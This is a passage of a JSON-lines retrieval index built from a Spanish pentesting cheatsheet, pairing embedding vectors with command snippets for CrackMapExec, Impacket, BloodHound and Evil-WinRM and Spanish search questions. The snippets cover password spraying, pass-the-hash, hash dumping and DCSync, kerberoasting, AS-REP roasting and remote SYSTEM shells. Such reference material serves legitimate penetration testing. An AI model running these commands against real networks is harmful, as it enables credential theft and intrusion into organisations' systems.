0.01586, 0.04594, 0.06279, 0.00221, -0.00962, 0.04325, 0.01085, 0.00997, 5e-05, 0.02077, 0.0088, 0.01024, -0.01088, 0.01399, -0.01356, -0.03822, 0.01154, -0.0186, -0.04962, -0.05777, 0.0029, 0.06572, 0.02186, -0.02115, -0.04655, 0.0142, -0.04407, 0.02458, -0.03861, -0.07466, -0.00839, 0.02538, 0.0428, -0.02635, 0.02941, -0.01759]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# CrackMapExec / NetExec β€” el navaja suiza de AD\ncrackmapexec smb IP -u USER -p PASS --shares\ncrackmapexec smb 10.0.0.0/24 -u USER -p PASS # barrido/spray\ncrackmapexec smb IP -u USER -H HASH --sam # pass-the-hash + dump SAM\ncrackmapexec winrm IP -u USER -p PASS -x \"whoami\"\nnetexec smb IP -u USER -p PASS --users --groups", "indexar": "con que puedo conectar y ejecutar comandos remotos a travΓ©s de WinRM?", "v": [0.14057, 0.07879, -0.13521, -0.11625, 0.17338, 0.04696, 0.06696, 0.06008, -0.04366, -0.1225, -0.10334, -0.06872, 0.13939, -0.04812, 0.1093, 0.11969, 0.04704, 0.05756, -0.08542, -0.0227, 0.10455, -0.11499, 0.01196, 0.02338, 0.00792, 0.04355, 0.11445, 0.03174, -0.05963, -0.07782, 0.06056, 0.00225, 0.08892, 0.00059, -0.00073, -0.05345, -0.07822, 0.15966, 0.02426, 0.10051, 0.00201, 0.07129, -0.15477, 0.00219, 0.05936, -0.04375, 0.06447, -0.07309, 0.10909, -0.0637, -0.13246, 0.00266, -0.11024, -0.10264, -0.07925, -0.04348, 0.19934, -0.04865, -0.02623, 0.00595, 0.00978, -0.04769, 0.04269, 0.07954, 0.04758, -0.07662, -0.10439, -0.10371, -0.09416, 0.08771, -0.10944, 0.05232, -0.01826, 0.0589, 0.05323, -0.00777, -0.08052, -0.03756, 0.13727, -0.00259, -0.02497, -0.07985, -0.05682, -0.02191, -0.10336, -0.11046, 0.00804, -0.01768, -0.01, -0.10297, 0.09185, -0.04758, -0.00274, -0.00238, 0.05005, 0.00699, -0.00243, -0.05482, 0.01452, 0.01643, -0.01297, 0.01813, -0.06174, 0.14241, 0.00301, 0.00518, 0.09508, -0.03658, 0.04623, 0.00101, -0.02152, -0.04359, -0.00159, -0.0904, -0.03806, -0.07296, -0.05865, -0.05305, 0.02119, -0.00287, -0.10833, -0.01108, 0.01592, 0.03047, -0.00318, -0.01554, -0.09407, 0.08664, 0.04308, 0.05722, -0.01802, 0.00426, 0.03969, -0.11301, -0.03564, 0.06291, -0.02647, -0.08001, -0.0387, -0.13478, 0.05252, 0.02489, 0.03363, -0.00933, 0.07853, 0.00671, 0.00207, -0.0041, -0.04991, 0.02105, 0.03025, 0.04914, -0.08896, 0.05492, -0.04831, -0.00298, -0.0152, -0.02082, 0.00625, 0.08564, -0.01208, 0.01102, -0.01849, -0.01846, 0.03378, -0.02876, -0.04477, -0.04491, 0.04752, 0.04412, -0.10401, 0.09094, -0.03621, -0.01782, -0.03456, -0.03509, -0.01725, -0.02616, 0.06094, -0.03346, -0.08255, 0.04102, -0.02627, -0.07687, 0.02146, 0.03256, -0.02686, 0.00226, -0.0134, 0.03597, -0.02556, 0.03713, -0.03748, -0.00842, 0.00438, -0.04043, -0.03051, -0.0019, -0.02418, -0.00799, -0.08417, 0.01335, 0.02759, -0.05193, 0.06513, 0.03065, -0.02768, 0.09637, -0.0084, 0.06582, 0.04254, -0.0613, 0.0842, -0.03488, -0.04723, -0.05001, 0.01838, -0.05735, -0.00926, 0.03674, 0.00126, 0.04675, 0.06419, -0.03716, 0.0443, 0.00356, 0.02262, 0.00902, 0.03254, -0.023, -0.0325, 0.01193, -1e-05, -0.06087, 0.06123, 0.01809, 0.00051, -0.07028, -0.04986, -0.00668, 0.00833, 0.07212, 0.00294, -0.07046, -0.00766, -0.08767, -0.15336, 0.03444, -0.02174, -0.05302, -0.01003, 0.02392, 0.07127, -0.02788, -0.01315, -0.0403]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Impacket\nimpacket-secretsdump DOM/USER:PASS@IP # dump de hashes\nimpacket-secretsdump -just-dc DOM/USER@IP -hashes :HASH # DCSync (con priv)\nimpacket-GetUserSPNs DOM/USER:PASS -dc-ip IP -request # kerberoasting\nimpacket-GetNPUsers DOM/ -usersfile users.txt -no-pass # AS-REP roasting\nimpacket-getTGT DOM/USER:PASS # pedir TGT (Pass-the-Ticket)\nimpacket-psexec DOM/USER:PASS@IP # shell SYSTEM\nimpacket-wmiexec DOM/USER:PASS@IP # shell sin tocar disco\nimpacket-smbexec DOM/USER@IP -hashes :HASH\nimpacket-mssqlclient DOM/USER:PASS@IP -windows-auth", "indexar": "que herramienta puedo usar para descargar hashes de usuarios en Windows?", "v": [-0.03127, 0.04943, -0.11322, -0.21287, 0.00029, -0.06662, -0.17619, -0.08022, 0.00877, -0.04279, -0.10689, -0.10683, -0.08435, -0.04769, -0.04307, -0.01819, 0.04344, -0.03652, -0.02344, 0.00705, 0.01224, -0.00834, -0.19239, 0.01083, -0.12004, 0.02889, -0.03246, -0.01739, -0.22195, -0.00625, 0.00705, -0.0531, -0.06696, 0.0041, -0.14735, 0.02158, -0.05537, 0.04781, 0.09804, 0.10085, 0.07165, 0.1349, -0.10538, 0.0782, 0.05807, -0.02471, 0.01211, -0.07185, 0.01561, 0.01006, 0.01074, -0.1393, -0.14684, -0.01758, 0.0147, -0.21487, 0.21531, -0.12104, -0.04958, -0.08306, -0.09123, 0.11364, -0.03788, 0.05556, -0.03822, -0.06233, 0.06536, 0.01536, -0.09866, 0.13944, -0.01702, 0.10036, 0.04859, -0.01413, 0.03047, 0.07912, -0.04494, -0.07333, 0.07459, -0.00821, 0.08449, -0.01073, 0.03095, -0.07179, -0.10942, -0.15241, 0.04127, -0.03994, 0.0984, -0.08349, 0.04964, 0.00416, -0.01582, 0.00879, 0.03664, -0.07284, 0.03471, -0.04805, 0.00817, 0.03491, 0.03061, -0.05914, 0.0203, 0.09171, -0.02735, -0.00845, -0.01805, -0.07343, -0.04253, -0.02793, 0.05784, -0.00781, -0.00791, 0.00195, -0.02805, 0.06301, 0.01913, -0.08605, -0.04903, -0.02377, -0.00701, 0.02543, -0.04519, -0.04701, 0.08372, -0.03939, -0.0198, 0.08041, -0.12493, -0.06745, 0.04451, -0.05257, -0.1135, 0.0197, -0.06547, -0.00229, 0.02526, -0.06918, 0.00316, -0.05105, 0.04668, 0.05361, -0.05944, -0.06842, 0.03893, 0.00881, 0.00537, 0.0111, -0.03461, -0.08227, 0.12236, -0.06993, -0.0424, -0.03323, -0.04043, 0.0063, 0.02048, 0.0567, -0.06104, -0.0252, -0.05038, -0.05464, 0.03871, -0.00619, -0.01379, -0.04124, 0.03243, 0.04352, 0.0335, 0.04034, 0.03535, 0.03229, 0.03527, -0.06022, 0.03433, -0.03926, -0.00234, 0.03224, -0.06595, -0.03936, -0.05613, -0.02015, 0.00292, -0.04689, -0.02251, -0.00589, -0.00094, 0.05841, -0.03085, 0.01656, -0.08269, 0.06487, 0.04978, -0.02808, 0.05316, 0.02157, -0.00023, -0.00898, 0.01998, -0.04538, -0.04091, -0.01009, -0.02813, -0.03473, 0.10473, 0.00465, -0.0175, -0.01722, 0.05748, -0.0004, 0.01939, 0.00037, 0.00049, -0.03561, -0.00549, -0.04405, 0.03905, 0.01903, 6e-05, -0.04603, -0.04127, 0.03998, 0.05485, 0.0123, -0.01332, 0.02463, -0.05575, 0.01038, -0.01668, 0.0029, 0.03653, 0.02301, -0.00194, -0.02078, 0.01502, -0.04953, 0.0055, 0.0098, -0.04667, -0.02359, -0.07123, 0.07963, 0.01696, -0.02339, -0.0702, -0.0334, 0.00169, -0.02325, -0.02187, -0.06547, -0.01584, 0.00711, 0.06046, -0.02876, -0.04904, 0.05958]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Impacket\nimpacket-secretsdump DOM/USER:PASS@IP # dump de hashes\nimpacket-secretsdump -just-dc DOM/USER@IP -hashes :HASH # DCSync (con priv)\nimpacket-GetUserSPNs DOM/USER:PASS -dc-ip IP -request # kerberoasting\nimpacket-GetNPUsers DOM/ -usersfile users.txt -no-pass # AS-REP roasting\nimpacket-getTGT DOM/USER:PASS # pedir TGT (Pass-the-Ticket)\nimpacket-psexec DOM/USER:PASS@IP # shell SYSTEM\nimpacket-wmiexec DOM/USER:PASS@IP # shell sin tocar disco\nimpacket-smbexec DOM/USER@IP -hashes :HASH\nimpacket-mssqlclient DOM/USER:PASS@IP -windows-auth", "indexar": "cual programa me permite robar credenciales mediante Kerberos o AS-REP?", "v": [-0.14173, -0.14281, 0.02018, -0.07323, 0.12699, -0.02878, 0.18237, 0.10338, -0.17914, -0.16127, -0.14151, -0.03877, 0.0651, -0.14474, 0.30199, 0.08746, -0.19066, 0.11664, 0.07895, 0.13988, 0.09165, -0.03316, -0.04287, -0.02332, 0.09846, 0.04798, 0.02857, -0.05795, 0.05345, 0.02425, -0.00851, 0.01574, 0.00412, -0.05201, -0.11465, 0.00571, -0.04006, 0.0263, 0.01388, 0.16245, 0.08316, 0.02376, -0.0743, 0.05517, 0.10953, -0.03806, -0.03658, 0.0195, -0.04546, 0.05258, 0.00735, 0.02378, -0.07776, -0.05056, 0.02216, -0.02578, 0.02673, -0.00153, -0.06383, -0.03202, 0.00045, -0.01893, -0.01949, -0.03664, 0.07893, -0.11995, 0.03765, -0.05846, -0.02284, 0.01361, -0.06715, 0.07844, 0.02125, 0.03498, -0.01483, -0.02851, -0.05182, -0.03031, 0.06605, -0.05632, -0.02954, -0.02017, -0.00765, 0.15346, 0.07599, -0.03446, 0.13226, 0.00524, -0.05193, -0.03953, 0.03261, 0.0395, 0.02554, 0.06964, -0.00298, -0.1002, 0.01229, 0.09409, -0.06293, 0.03574, 0.01345, -0.08061, -0.10379, 0.0596, -0.08833, 0.06126, -0.01691, 0.05682, 0.00615, -0.0331, -0.01988, 0.03412, -0.0351, -0.0426, -0.01839, 0.08746, -0.0064, -0.04446, 0.04592, -0.05923, -0.00804, -0.00897, -0.02489, 0.00957, 0.09168, -0.00029, 0.04295, 0.10189, -0.08078, -0.00838, 0.01363, 0.05947, 0.04869, 0.00183, 0.02542, -0.08217, -0.06611, -0.08452, -0.06874, -0.01122, -0.01703, 0.05674, 0.0087, 0.05667, -0.00893, 0.0093, 0.02125, -0.04372, 0.05343, 0.0031, -0.03402, 0.06691, -0.07487, 0.03429, -0.01269, 0.01255, 0.02356, -0.05133, -0.10388, 0.05106, -0.04295, -0.01422, 0.01431, -0.02357, 0.00319, -0.05406, 0.05003, 0.03182, 0.07997, 0.05073, 0.01395, 0.02591, 0.03734, 0.00421, -0.00115, 0.01904, 0.03773, -0.04892, -0.0135, -0.04812, -0.06811, 0.06075, 0.12931, 0.0546, -0.05415, -0.00691, -0.03558, 0.07352, -0.02108, -0.06614, 0.06257, -0.01505, -0.02764, 0.00634, 0.0027, -0.02503, -0.0037, -0.01675, 0.01069, 0.05158, -0.07562, 0.04032, -0.00747, -0.04989, 0.06633, 0.04419, 0.07076, -0.03017, -0.00282, 0.07346, 0.04339, -0.04024, 0.07383, -0.03221, -0.02224, -0.00663, -0.00107, 0.01998, -0.04224, 0.00485, 0.03675, -0.05272, 0.07562, 0.05578, -0.01948, 0.01683, -0.02697, 0.02667, -0.04809, -0.02038, -0.02824, -0.01478, -0.06057, -0.07673, -0.00443, -0.01884, -0.05063, 0.01724, 0.03603, -0.06518, -0.0535, 0.04599, -0.03809, -0.053, -0.03863, 0.05929, -0.04778, -0.01766, 0.00558, 0.01837, 0.00125, 0.06076, -0.06605, -0.06761, 0.04501, -0.0357]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Impacket\nimpacket-secretsdump DOM/USER:PASS@IP # dump de hashes\nimpacket-secretsdump -just-dc DOM/USER@IP -hashes :HASH # DCSync (con priv)\nimpacket-GetUserSPNs DOM/USER:PASS -dc-ip IP -request # kerberoasting\nimpacket-GetNPUsers DOM/ -usersfile users.txt -no-pass # AS-REP roasting\nimpacket-getTGT DOM/USER:PASS # pedir TGT (Pass-the-Ticket)\nimpacket-psexec DOM/USER:PASS@IP # shell SYSTEM\nimpacket-wmiexec DOM/USER:PASS@IP # shell sin tocar disco\nimpacket-smbexec DOM/USER@IP -hashes :HASH\nimpacket-mssqlclient DOM/USER:PASS@IP -windows-auth", "indexar": "con que puedo ejecutar un shell SYSTEM a distancia sin tocar el disco?", "v": [-0.0869, -0.12051, -0.32486, -0.05395, 0.02445, -0.05862, -0.15481, 0.01025, 0.05196, 0.0421, -0.07819, 0.06948, -0.02215, -0.1504, 0.1588, -0.01293, 0.02534, -0.04093, -0.06569, 0.0096, -0.00173, -0.11774, -0.02444, 0.02794, 0.12351, 0.00707, -0.0672, 0.01787, -0.159, -0.03555, 0.01583, -0.04116, 0.11148, -0.15552, 0.08752, -0.12482, 0.02827, -0.0102, 0.11075, 0.06391, -0.09219, 0.04735, -0.00838, 0.04601, 0.07242, -0.00257, 0.06393, -0.06236, 0.04519, -0.07378, -0.04688, 0.03846, -0.17333, -0.12698, -0.00587, -0.11043, 0.11218, -0.05621, 0.11672, 0.11031, -0.03868, -0.04244, 0.07288, 0.078, 0.10723, 0.05721, 0.04242, -0.11931, 0.01258, 0.1511, -0.11154, -0.01781, 0.05661, 0.03014, 0.03196, 0.02078, -0.00532, -0.02458, 0.03251, -0.0357, -0.03481, -0.10393, -0.01956, 0.01911, -0.0956, 0.00248, 0.03013, -0.01487, -0.01215, -0.02164, 0.08265, -0.04939, -0.06014, 0.08821, 0.05902, 0.01368, 0.03223, 0.0428, -0.08826, -0.0114, 0.08474, -0.01868, -0.04172, 0.00083, 0.04832, 0.02791, 0.06444, 0.00295, 0.11585, 0.0985, -0.04417, 0.01356, 0.00797, -0.12498, -0.05684, -0.0805, 0.00112, 0.00547, -0.05474, 0.0313, 0.0016, 0.02189, -0.05625, -0.03113, 0.06748, 0.00505, -0.00728, 0.05567, -0.02796, 0.01956, 0.0517, 0.00456, 0.03216, 0.01079, 0.09066, 0.08452, -0.07166, -0.01346, -0.00524, -0.05987, 0.07591, 0.12283, -0.03704, 0.00109, 0.05562, 0.03496, 0.0448, 0.0204, -0.05134, -0.01046, 0.0052, 0.05743, -0.02957, 0.05031, -0.03782, 0.02157, 0.05518, 0.00685, -0.01069, -0.0504, 0.04551, 0.04234, -0.05143, -0.02985, -0.03919, 0.01117, -0.02392, -0.04854, 0.02873, 0.07856, -0.11544, 0.05762, 0.02837, 0.03145, 0.00552, -0.06717, -0.03774, -0.02176, 0.10078, 0.00385, -0.04486, 0.00868, -0.03353, -0.11613, 0.03636, 0.02403, -0.02474, 0.02308, -0.00457, 0.03639, 0.09529, 0.03698, -0.00481, 0.01301, 0.02515, -0.01876, 0.00923, -0.01018, -0.05388, 0.05487, -0.05013, -0.01955, 0.01385, -0.06205, 0.05838, 0.04476, -0.02978, 0.03778, -0.0221, 0.01207, 0.0487, -0.01485, 0.04093, 0.00109, -0.00171, 0.00294, 0.02865, 0.04139, 0.00635, 0.06964, -0.04163, 0.05237, 0.13005, -0.01888, -0.03361, 0.00779, 0.03017, -0.0077, 0.05144, -0.01085, -0.00281, -0.00322, 0.02139, 0.01484, 0.00408, 0.0111, 0.00791, -0.07097, -0.05307, -0.02009, 0.01462, 0.05539, -0.01305, -0.05637, -0.00894, -0.0525, -0.09232, -0.0186, -0.03628, -0.05082, -0.01968, 0.01661, 0.02132, -0.05331, 0.03778, 0.04147]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# BloodHound (recoleccion)\nbloodhound-python -d DOM -u USER -p PASS -ns IP -c all", "indexar": "que programa hay para recolectar informaciΓ³n de Active Directory desde una IP especΓ­fica?", "v": [-0.12869, 0.00565, -0.13287, -0.182, 0.18256, -0.21219, 0.07169, -0.01168, -0.19007, 0.02401, 0.04833, -0.08883, 0.01884, -0.18434, 0.11797, 0.0192, 0.02739, -0.0945, -0.01916, -0.13462, -0.0992, 0.13244, -0.06412, 0.07622, -0.01746, 0.13672, -0.10717, 0.03686, 0.03686, -0.06158, -0.02562, -0.03983, -0.01614, -0.07181, -0.02153, -0.07022, 0.05647, 0.07128, 0.02771, -0.06064, -0.07432, -0.03675, -0.12141, 0.04799, 0.13068, 0.1312, 0.00893, -0.12032, -0.0067, -0.01241, -0.12224, -0.04925, -0.01319, -0.03531, -0.03213, -0.00728, -0.10874, -0.03213, -0.04454, 0.00709, 0.05414, 0.04592, -0.11363, -0.06268, 0.00324, -0.06162, 0.07185, -0.07746, -0.06169, -0.01515, 0.0846, 0.0054, 0.05553, 0.09965, 0.05912, -0.0128, 0.04732, -0.07247, 0.00692, 0.02067, 0.03103, 0.00654, -0.004, 0.03643, -0.06739, -0.08538, 0.12007, -0.12415, 0.04585, -0.08672, 0.0666, 0.09822, -0.0308, 0.1031, 0.07062, -0.01865, 0.12089, 0.06512, 0.05721, 0.04205, -0.00539, -0.04433, -0.02196, 0.11617, 0.02756, 0.12359, 0.05398, 0.05418, -0.04763, 0.05234, -0.07527, -0.03632, 0.01581, -0.07558, 0.04725, 0.06138, -0.05683, -0.02829, 0.06874, -0.04292, -0.07657, -0.01243, 0.00967, 0.04858, 0.05892, -0.00013, -0.07631, 0.04884, 0.04253, 0.07458, 0.01214, 0.058, -0.0226, -0.07312, -0.03019, -0.03893, -0.0226, -0.02284, -0.02289, -0.01652, -0.00408, -0.03272, 0.0172, 0.05472, 0.07762, -0.09708, -0.01236, -0.01702, -0.0035, 0.024, 0.06271, 0.04026, 0.05718, 0.01607, -0.03671, 0.1082, -0.03497, -0.01147, -0.00712, 0.01941, -0.03461, -0.02619, -0.0258, -0.08233, 0.02422, 0.00774, -0.10557, -0.02632, 0.12557, 0.06652, -0.07357, 0.04581, -0.021, -0.11034, -0.06538, -0.03504, -0.00462, -0.0437, 0.0644, -0.03589, -0.08533, -0.01054, 0.01837, -0.02332, 0.01779, -0.01844, 0.03142, -0.00655, 0.00088, -0.00451, 0.02357, 0.02933, -0.02625, 0.01166, -0.03166, -0.04431, -0.03558, 0.00918, 0.05727, -0.00144, -0.0516, -0.00115, 0.0042, 0.01568, 0.022, 0.05845, -0.03126, 0.03145, 0.06238, 0.05155, -0.02311, -0.00223, 0.08736, 0.0253, -0.06319, -0.01433, 0.04916, 0.06202, 0.00407, 0.06533, 4e-05, 0.00127, 0.02324, 0.02564, 0.0091, -0.0597, 0.04833, 0.02849, 0.05329, 0.01254, -0.03649, 0.02109, 0.00647, -0.05389, 0.01631, 0.02459, 0.00668, -0.02419, -0.01105, -0.08032, 0.00152, 0.0515, 0.00898, -0.02159, -0.04384, -0.01153, -0.07768, 0.06155, 0.00246, -0.04068, -0.01443, -0.00362, 0.04305, -0.03979, -0.00282, 0.00228]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# BloodHound (recoleccion)\nbloodhound-python -d DOM -u USER -p PASS -ns IP -c all", "indexar": "con quΓ© puedo montar un ataque de recolecciΓ³n de credenciales?", "v": [0.07174, 0.08701, -0.15975, -0.01635, -0.08228, 0.07255, 0.07508, 0.17554, -0.11782, -0.08889, -0.07881, 0.0033, -0.00757, -0.05251, 0.13555, 0.07928, 0.00216, 0.06535, 0.08097, -0.04519, -0.05952, -0.14843, 0.02378, -0.07192, 0.00502, 0.10484, -0.03868, 0.09517, -0.00501, -0.07326, 0.02963, -0.02409, 0.00391, 0.16325, 0.05328, -0.03792, -0.09012, 0.12037, 0.03033, 0.01483, -0.09855, -0.04582, -0.19278, -0.00254, 0.04549, -0.05341, 0.0237, -0.02869, -0.06358, -0.03953, 0.11514, 0.03875, -0.16159, -0.11669, -0.0678, 0.0013, 0.04235, -0.00928, 0.08636, 0.00821, -0.05802, 0.13419, -0.02113, -0.0268, 0.07589, -0.01971, -0.088, -0.00555, -0.08744, -0.03068, 0.02998, -0.05862, 0.00549, 0.03447, -0.00111, 0.05024, 0.04461, 0.0856, 0.0422, 0.01481, 0.06292, -0.04517, 0.01459, -0.05659, 0.01456, -0.00703, 0.02917, -0.14889, -0.00208, -0.03466, 0.06072, 0.00315, -0.01668, -0.04264, -0.09155, -0.05661, -0.04864, -0.00357, -0.05181, 0.04525, -0.11596, -0.14507, 0.01519, 0.12827, 0.06572, 0.06385, -0.0254, -0.02664, 0.02084, -0.16024, 0.00741, -0.00706, -0.1176, 0.02218, -0.04349, -0.06131, -0.11255, 0.08777, -0.0008, -0.00318, -0.00596, 0.00024, 0.10039, 0.04259, 0.02712, -0.01638, -0.01284, -0.02244, -0.10083, -0.06819, -0.06942, 0.01438, 0.02693, -0.02321, 0.03746, -0.06829, -0.02919, -0.13512, -0.12551, 0.04769, 0.02351, -0.00585, -0.03946, -0.04321, 0.03284, 0.01329, 0.00797, -0.05866, -0.02288, -0.07791, 0.13387, 0.13824, 0.12039, 0.00588, 0.01056, -0.01216, 0.09406, -0.05716, -0.00855, 0.03427, -0.00521, -0.02827, -0.03386, 0.07749, -0.04476, -0.04492, 0.04288, -0.05927, 0.07053, 0.01347, 0.04218, -0.05715, -0.03714, -0.02919, 0.06499, 0.01236, -0.07578, -0.04888, 0.07883, -0.01238, 0.03525, -0.03121, -0.03165, 0.0271, -0.0011, 0.03193, 0.04192, 0.07447, 0.0344, 0.03661, -0.01908, 0.00757, 0.02073, 0.03094, 0.04474, -0.06896, 0.04434, 0.08186, 0.00362, 0.11739, -0.02851, -0.02846, -0.0065, 0.01591, 0.08425, 0.03162, -0.08142, 0.01907, 0.04501, 0.07389, 0.05791, 0.01632, 0.07084, -0.07467, -0.04049, -0.01343, -0.03727, 0.01775, -0.0706, 0.00893, 0.02939, -0.01783, 0.03167, 0.07385, -0.01804, -0.03308, -0.0195, -0.02101, 0.06987, 0.05541, 0.00411, -0.01304, -0.01473, -0.02376, -0.03515, -0.03323, 0.04102, 0.06946, -0.06231, -0.00467, 0.00306, -0.01109, -0.02391, -0.03043, -0.03215, -0.00392, -0.02141, 0.07391, -0.05537, -0.05513, -0.03177, 0.00444, -0.01648, 0.00765, 0.03921, -0.0334]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# BloodHound (recoleccion)\nbloodhound-python -d DOM -u USER -p PASS -ns IP -c all", "indexar": "existe alguna herramienta gratuita para extraer usuarios y grupos de dominio?", "v": [-0.03327, 0.09205, -0.12546, -0.16306, -0.08184, -0.04829, -0.01545, -0.03129, -0.14722, -0.09389, -0.03406, -0.10138, 0.03707, -0.13619, 0.06419, -0.10043, 0.1694, -0.02158, -0.00353, -0.0445, -0.0545, 0.00467, -0.07179, -0.03095, -0.11319, -0.09653, -0.07634, -0.11393, -0.05235, 0.23276, 0.05978, -0.03438, -0.05018, -0.08563, -0.1004, -0.11958, 0.07387, 0.01647, 0.07351, 0.08137, 0.05541, 0.01009, -0.12968, 0.00661, -0.07497, 0.09556, -0.10816, 0.01463, 0.04511, -0.00219, 0.03372, -0.09572, -0.13575, -0.00767, -0.05277, -0.14544, 0.19036, -0.18034, -0.01203, -0.08003, -0.09175, 0.0297, -0.0494, 0.01087, -0.03901, -0.03015, 0.06958, 0.00864, -0.08208, 0.13283, 0.01833, -0.03145, 0.09386, -0.00258, 0.02507, -0.05954, 0.04948, -0.02807, 5e-05, 0.02905, 0.06804, 0.0499, 0.01642, -0.11006, -0.13807, -0.11034, -0.00476, -0.08747, 0.0212, -0.02771, 0.07669, 0.07782, 0.01167, -0.00869, -0.00886, -0.09283, 0.06784, -0.05809, -0.01478, -0.02028, 0.15521, 0.057, -0.06318, 0.10153, 0.09004, 0.0644, -0.0218, -0.04294, -0.01865, 0.01741, 0.02103, -0.07277, 0.00143, 0.00483, 0.00484, 0.03511, -0.03958, 0.0281, 0.0085, -0.06433, 0.00528, -0.004, -0.04142, -0.06683, 0.00227, -0.00857, 0.03118, 0.05698, -0.06972, -0.14056, 0.02426, -0.04299, -0.04486, 0.02265, -0.06805, -0.01488, 0.04478, -0.04616, -0.02307, -0.03534, -0.00821, -0.00684, -0.14544, -0.09039, -0.02502, -0.05059, 0.04195, -0.05674, -0.00865, -0.03559, -0.03591, -0.03884, -0.07561, 0.04731, 0.01143, 0.04742, -0.07962, 0.03609, -0.08714, -0.0125, -0.03844, -0.0974, 0.04643, -0.06025, -0.03078, -0.00638, 0.03091, 0.00099, -0.00347, 0.10635, 0.04577, 0.01611, 0.11586, -0.03127, 0.01507, -0.00504, 0.00056, -0.01466, 0.00941, -0.06409, 0.01971, -0.05421, 0.0077, -0.02139, -0.02599, 0.00266, 0.00408, 0.02617, -0.01722, 0.05089, -0.00261, 0.04541, -0.02659, -0.02001, 0.02996, -0.0145, 0.02218, -0.05752, 0.02088, -0.01723, -0.04372, -0.04114, 0.03329, 0.00607, -0.06561, 0.00499, 0.04107, -0.04563, 0.0605, -0.00415, 0.03688, 0.04508, -0.04004, -0.05645, -0.03146, 0.00156, 0.00489, -0.008, -0.01786, -0.03818, -0.06443, 0.03674, 0.07272, 0.01906, 0.05221, 0.06994, -0.01915, -0.00166, -0.01465, 0.00092, 0.0404, -0.01651, 0.01629, -0.01917, 0.0385, -0.04737, 0.06509, 0.021, -0.00931, 0.03968, -0.04122, 0.02699, 0.04991, -0.00125, -0.07604, -0.0668, -0.01885, -0.01186, -0.05237, -0.04471, 0.00735, -0.00423, 0.01585, 0.00447, 0.00471, 0.04078]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Evil-WinRM (shell interactiva Windows)\nevil-winrm -i IP -u USER -p PASS\nevil-winrm -i IP -u USER -H HASH # pass-the-hash\n```", "indexar": "que herramienta sirve para acceder remotamente a un servidor windows usando hash", "v": [0.0321, -0.02661, -0.24557, -0.24241, 0.01771, -0.13023, -0.12983, -0.10652, 0.04635, -0.02842, -0.13465, -0.11464, 0.02737, -0.02208, 0.06897, 0.07645, 0.15041, -0.05696, -0.02507, 0.03509, 0.0262, 0.05844, -0.04714, -0.00312, -0.11918, -0.04364, 0.06605, -0.03166, -0.18686, -0.02997, 0.03589, -0.05449, -0.00782, -0.0091, -0.09977, -0.02789, -0.05552, 0.13328, 0.02362, 0.08561, 0.0712, 0.1127, -0.13761, 0.03643, 0.05681, -0.0409, 0.03827, -0.03367, 0.03304, 0.05184, -0.08179, -0.1405, -0.20635, -0.02963, 0.02084, -0.0391, 0.18387, -0.11815, -0.01034, -0.04624, -0.16312, 0.02009, -0.07062, -0.05543, 0.0004, -0.07608, -0.00742, -0.061, -0.04913, 0.06114, -0.11797, 0.02456, 0.06103, -0.04903, 0.00831, 0.03506, -0.05842, -0.01946, 0.08335, -0.00563, 0.03647, 0.00693, -0.05949, 0.00114, -0.10909, -0.16501, 0.0664, -0.02698, 0.07078, -0.04814, 0.0519, 0.0623, -0.07944, 0.08888, 0.05327, -0.02578, 0.06322, -0.06913, -0.00656, -0.03476, 0.12149, -0.03156, -0.05817, 0.08813, -0.04054, 0.07472, 0.06339, -0.08203, -0.04817, -0.02147, 0.09322, 0.00474, -0.05988, -0.01336, -0.05306, -0.01094, -0.01775, -0.05876, 0.0061, 0.04395, -0.04681, -0.00489, -0.04047, 0.03048, 0.01948, -0.07084, 0.00694, 0.04673, -0.04329, -0.05096, 0.02632, -0.02861, -0.09482, 0.01424, -0.01237, 0.02762, 0.04013, -0.13343, -0.04023, -0.07805, 0.07782, 0.07365, -0.03825, -0.03456, 0.07408, 0.00993, 0.07408, -0.01631, -0.04456, -0.01349, 0.05526, -0.09407, -0.04341, 0.01687, -0.10781, -0.02333, -0.04631, -0.01163, -0.09634, 0.04222, -0.03561, -0.03954, 0.02666, 0.04812, 0.00203, -0.0456, 0.02269, 0.01619, 0.0905, 0.05767, -0.03683, 0.02119, 0.03251, -0.03707, -0.00915, -0.03214, -0.03174, -0.03159, -0.04556, -0.02871, -0.06457, -0.01614, -0.03348, -0.03587, -0.02838, -0.00438, -0.00775, -0.00774, -0.01024, 0.00819, -0.01445, 0.01748, -0.03384, -0.01221, 0.05707, -0.00282, -0.05409, -0.06733, 0.04689, -0.02972, -0.03566, -0.0298, 0.00178, -0.04871, 0.07352, 0.0319, -0.03665, 0.01091, 0.02508, 0.05101, -0.01472, -0.00705, 0.02326, 0.00784, -0.00225, -0.02731, 0.06252, -0.03059, -0.03139, -0.01761, -0.00505, -0.0011, 0.02131, 0.0169, 0.00292, 0.06356, 0.00252, 0.00913, 0.0138, -0.04287, -0.0003, 0.00369, -0.03355, 0.00955, 0.01361, -0.07604, 0.00602, -0.03753, -0.04461, 